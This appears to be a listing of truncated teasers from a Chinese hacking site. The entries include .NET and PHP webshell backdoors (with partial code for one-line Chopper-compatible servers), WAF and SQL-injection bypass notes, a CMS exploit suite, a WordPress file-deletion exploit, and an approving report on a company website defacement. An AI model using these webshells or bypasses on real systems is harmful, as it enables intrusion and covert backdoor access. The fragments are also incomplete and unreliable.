曾黑掉天涯论坛,盗走马化腾QQ的16岁“菜霸”

那个16岁盗走马化腾QQ,还震惊央视的农村男孩,现在活得很成功!十几年前,还没有微博、微信、知乎。但在网络上却有这样一个无人不知,无人不晓的江湖——“天涯社区”,和它的名字一样,这里鱼龙混杂,又有情有义,有无数大神。当年的天涯孕育了一个又一个爆点:慕容雪村和他的《成都,今夜请将我遗忘》、芙蓉姐姐、奇葩小月月、天下霸唱和他的《鬼吹灯》……如今,论坛的黄金时代落下帷幕,逐渐走向衰落的天涯或许只能成为天涯“沦落人”共同的回忆,成为互联网历史中的一段传奇。而曾经火遍天涯的大神,也就此退隐江湖。其中有这样

.net下asmx一句话服务端两个

接力昨天的ashx一句话http://www.5kik.com/aspnews/646.html,今天放出的是基于webservice实现的一句话,另外还有asmx的小马 一并打包。<%@ WebService Language="JScript" class="ScriptMethodSpy"%>import System;import System.Web;import Syste

CMS漏洞检测和利用套件

CMSeeK是一个CMS的漏洞检测和利用套件。已发布版本- Version 1.0.1 [19-06-2018] - Version 1.0.0 [15-06-2018]Changelog文件特性支持20多种CMS的基本CMS检测高级Wordpress扫描版本检测用户检测(3种检测方法)查找版本漏洞等!模块化爆破系统 你可以根据需求选择自带爆破模块或自己创建模块并与之集成安装要求及兼容性:CMSeeK是由python

PHP使用流包装器实现WebShell

0×00 前言在Web安全领域WebShell的构造与查杀是永不停息的话题,这几天发现了一种新型方式生成WebShell,隐蔽度高,目前安全查杀软件没法检测到相关的后门漏洞,不同于 eval 或则 asset 等方式运行后门,对于这两个函数禁用的情况下一样适用,目前除了禁用相关函数还暂时没有相关方式来避免漏洞。0×01 后门原理在PHP开发中,我们使用最为频繁的指令大概就是 include 指令, include 指令中一些比较普通的文件包含漏洞我们就忽略了,先来看看一串代码:include&n

一些bypass语句

AF evasion methods for sql Injections  I want to share WAF evasion methods for sql Injections. Most are old but few are newer. You&nbs

“疫苗门”涉事公司官网被黑:不搞你,对不起祖国的花朵

“疫苗门”风波持续发酵,“疫苗事件”的话题讨论也持续占据微博热搜榜第一。今天早上,涉事公司之一的长生生物科技有限公司官网(http://china.cs-vaccine.com/)被黑客攻击,并配文表示:不搞你,对不起祖国的花朵。有意思的是,网站title被修改成“Anonymous”,不知大家是否还记得那个全球最大的黑客组织“匿名者”……被黑期间,网站被挂上两张图,一张是这几天在微博、朋友圈刷屏的那张那张表情包,另一张则是李克强总理对疫苗事件强硬的回应:必须给全国人民一个明明白白的交代。另外一

.net下ashx菜刀可用的一句话服务端两个

<%@ WebHandler Language="JScript" class="AsyncHandlerSpy"%>import System;import System.Web;import System.IO;public class AsyncHandlerSpy implements IHttpAsyncHandler{function

WAF绕过的一些总结和思考

(测试环境 windows 2003 Enterprise 中文语言包 + APAC++HE + WAF)WAF分类:1.网络层类2.最常见且容易部署的应用层类 (部署在APAC++HE之前,APAC++HE之后)应用层WAF – 利用WAF自身缺陷和MYSQL语法特性并结合实际绕过:WAF最常见检测方式:关键词检测 例如 如果出现 [空格]union[空格] 这样的SQL语句则视为恶意请求,丢弃这个数据包,XSS代码同理。常见的绕过类型:类型1:数据包 -> WAF(利用string存储

不包含数字字母的WebShell

2.png

Wordpress 4.9.6及以下版本 任意文件删除漏洞

Wordpress <= 4.9.6 任意文件删除漏洞WordPress是如今使用最为广泛的一套内容管理系统。根据 w3tech 统计,全世界大概有30%的网站运行着WordPress程序。昨日RIPS团队公开了一个Wordpress的任意文件删除漏洞(需要登录),目前该漏洞仍然未修复(2018年06月27日),该漏洞影响 Wordpress 最新版 4.9.6.本文我们将结合 VulnSpy 的在线 WordPress 环境来演示该漏洞的利用。VulnSpy Wordpress 4.9